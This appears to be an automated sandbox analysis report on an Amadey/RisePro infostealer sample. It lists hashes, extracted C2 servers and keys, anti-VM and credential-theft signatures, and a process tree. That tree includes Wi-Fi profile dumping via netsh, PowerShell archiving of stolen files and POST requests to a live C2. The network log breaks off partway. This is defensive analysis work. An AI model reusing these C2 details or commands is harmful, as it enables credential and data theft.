Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/04/2024, 17:07 UTC

General

  • Target

    acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe

  • Size

    1.8MB

  • MD5

    3129fec389a088955fae72aa12b20ef0

  • SHA1

    e4cc27027754574a6abdf0010333930016b37fb5

  • SHA256

    acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75

  • SHA512

    918ac19261d99d7ea7cc92bdf6e72a8caff90eb6241c650fe95cf0230bce9af8bc52231c0a7452244b88b6024b0061351520e57400952e4bf4191e67bc8139e9

  • SSDEEP

    49152:r3/bnfCUYZWGdSbS36Q5DTFpcL4Mne/qMFZQK:rjnf2vFpcL1uFZ

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://193.233.132.139

Attributes
  • install_dir

    5454e6f062

  • install_file

    explorta.exe

  • strings_key

    c7a869c5ba1d72480093ec207994e2bf

  • url_paths

    /sev56rkm/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

amadey

Version

4.17

C2

http://193.233.132.167

Attributes
  • install_dir

    4d0ab15804

  • install_file

    chrosha.exe

  • strings_key

    1a9519d7b465e1f4880fa09a6162d768

  • url_paths

    /enigma/index.php

rc4.plain
1
c1ec479e5342a25940592acf24703eb2

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 3 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 63 IoCs
  • Suspicious use of SendNotifyMessage 60 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
    "C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3136
    • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
      "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4688
      • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
        "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
        3⤵
          PID:2332
        • C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe
          "C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          PID:4812
        • C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe
          "C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:2428
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
            4⤵
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of WriteProcessMemory
            PID:2364
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaef08ab58,0x7ffaef08ab68,0x7ffaef08ab78
              5⤵
                PID:2500
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:2
                5⤵
                  PID:2740
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                  5⤵
                    PID:952
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                    5⤵
                      PID:3500
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
                      5⤵
                        PID:4916
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
                        5⤵
                          PID:1680
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3600 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
                          5⤵
                            PID:4924
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3264 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:1
                            5⤵
                              PID:4664
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3328 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                              5⤵
                                PID:2708
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                                5⤵
                                • Modifies registry class
                                PID:1584
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                                5⤵
                                  PID:4244
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                                  5⤵
                                    PID:1840
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                                    5⤵
                                      PID:3276
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                                      5⤵
                                        PID:2176
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                                        5⤵
                                          PID:528
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:8
                                          5⤵
                                            PID:3048
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:2
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3248
                                      • C:\Users\Admin\1000017002\13ee951efa.exe
                                        "C:\Users\Admin\1000017002\13ee951efa.exe"
                                        3⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2272
                                  • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                    1⤵
                                      PID:3568
                                    • C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                      C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                      1⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3068
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                        2⤵
                                        • Loads dropped DLL
                                        PID:1712
                                        • C:\Windows\system32\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Loads dropped DLL
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:4968
                                          • C:\Windows\system32\netsh.exe
                                            netsh wlan show profiles
                                            4⤵
                                              PID:2484
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\906287020291_Desktop.zip' -CompressionLevel Optimal
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:3520
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                          2⤵
                                          • Blocklisted process makes network request
                                          • Loads dropped DLL
                                          PID:1044
                                      • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                        C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                        1⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2484
                                      • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                        C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                        1⤵
                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Identifies Wine through registry keys
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3428

                                      Network

                                      • flag-us
                                        DNS
                                        g.bing.com
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        g.bing.com
                                        IN A
                                        Response
                                        g.bing.com
                                        IN CNAME
                                        g-bing-com.dual-a-0034.a-msedge.net
                                        g-bing-com.dual-a-0034.a-msedge.net
                                        IN CNAME
                                        dual-a-0034.a-msedge.net
                                        dual-a-0034.a-msedge.net
                                        IN A
                                        204.79.197.237
                                        dual-a-0034.a-msedge.net
                                        IN A
                                        13.107.21.237
                                      • flag-us
                                        GET
                                        https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E
                                        Remote address:
                                        204.79.197.237:443
                                        Request
                                        GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
                                        host: g.bing.com
                                        accept-encoding: gzip, deflate
                                        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                        Response
                                        HTTP/2.0 204
                                        cache-control: no-cache, must-revalidate
                                        pragma: no-cache
                                        expires: Fri, 01 Jan 1990 00:00:00 GMT
                                        set-cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; domain=.bing.com; expires=Thu, 22-May-2025 17:07:29 GMT; path=/; SameSite=None; Secure; Priority=High;
                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                        access-control-allow-origin: *
                                        x-cache: CONFIG_NOCACHE
                                        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        x-msedge-ref: Ref A: 693888A47EF44E92B03D25D90D7D9BF1 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:29Z
                                        date: Sat, 27 Apr 2024 17:07:29 GMT
                                      • flag-us
                                        GET
                                        https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E
                                        Remote address:
                                        204.79.197.237:443
                                        Request
                                        GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E HTTP/2.0
                                        host: g.bing.com
                                        accept-encoding: gzip, deflate
                                        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                        cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA; _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312
                                        Response
                                        HTTP/2.0 204
                                        cache-control: no-cache, must-revalidate
                                        pragma: no-cache
                                        expires: Fri, 01 Jan 1990 00:00:00 GMT
                                        set-cookie: MSPTC=5kAXrMywdhLn16yyUT0Rj-ACdIrO-_FBZkgY3G-ae6E; domain=.bing.com; expires=Thu, 22-May-2025 17:07:30 GMT; path=/; Partitioned; secure; SameSite=None
                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                        access-control-allow-origin: *
                                        x-cache: CONFIG_NOCACHE
                                        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        x-msedge-ref: Ref A: 9D807B57F5A04C778A641BE2280068F6 Ref B: LON04EDGE1212 Ref C: 2024-04-27T17:07:30Z
                                        date: Sat, 27 Apr 2024 17:07:30 GMT
                                      • flag-nl
                                        GET
                                        https://www.bing.com/aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893
                                        Remote address:
                                        23.62.61.194:443
                                        Request
                                        GET /aes/c.gif?RG=a7a89982c8dd4b0786daab865ebdfa30&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131952Z&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893 HTTP/2.0
                                        host: www.bing.com
                                        accept-encoding: gzip, deflate
                                        user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                        cookie: MUID=39284F0CA7EB6DE029235B62A60B6CFA
                                        Response
                                        HTTP/2.0 200
                                        cache-control: private,no-store
                                        pragma: no-cache
                                        vary: Origin
                                        p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
                                        accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        x-msedge-ref: Ref A: 350BA4A5571A486D803814C7B9FBA84B Ref B: AMS04EDGE2718 Ref C: 2024-04-27T17:07:30Z
                                        content-length: 0
                                        date: Sat, 27 Apr 2024 17:07:30 GMT
                                        set-cookie: _EDGE_S=SID=0CCD0984AA79622819C61DEAABFA6312; path=/; httponly; domain=bing.com
                                        set-cookie: MUIDB=39284F0CA7EB6DE029235B62A60B6CFA; path=/; httponly; expires=Thu, 22-May-2025 17:07:30 GMT
                                        alt-svc: h3=":443"; ma=93600
                                        x-cdn-traceid: 0.be3d3e17.1714237650.112e0ca5
                                      • flag-us
                                        DNS
                                        8.8.8.8.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        8.8.8.8.in-addr.arpa
                                        IN PTR
                                        Response
                                        8.8.8.8.in-addr.arpa
                                        IN PTR
                                        dnsgoogle
                                      • flag-us
                                        DNS
                                        237.197.79.204.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        237.197.79.204.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        73.159.190.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        73.159.190.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        240.221.184.93.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        240.221.184.93.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        95.221.229.192.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        95.221.229.192.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        194.61.62.23.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        194.61.62.23.in-addr.arpa
                                        IN PTR
                                        Response
                                        194.61.62.23.in-addr.arpa
                                        IN PTR
                                        a23-62-61-194deploystaticakamaitechnologiescom
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 4
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Refresh: 0; url = Login.php
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 158
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
                                        explorta.exe
                                        Remote address:
                                        193.233.132.139:80
                                        Request
                                        POST /sev56rkm/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.139
                                        Content-Length: 31
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.139/sev56rkm/index.php
